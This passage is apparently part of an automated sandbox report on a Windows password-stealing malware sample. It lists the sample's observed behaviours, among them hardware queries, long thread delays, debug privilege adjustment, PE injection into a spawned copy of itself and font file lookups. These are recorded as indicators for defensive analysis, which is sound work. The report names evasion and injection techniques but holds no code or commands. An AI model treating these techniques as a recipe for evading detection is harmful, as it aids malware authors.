                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 95B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 9780000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: A780000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 1730000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 3180000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWindow / User API: threadDelayed 1187Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe TID: 2492Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe TID: 6888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2983662902.00000000014E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
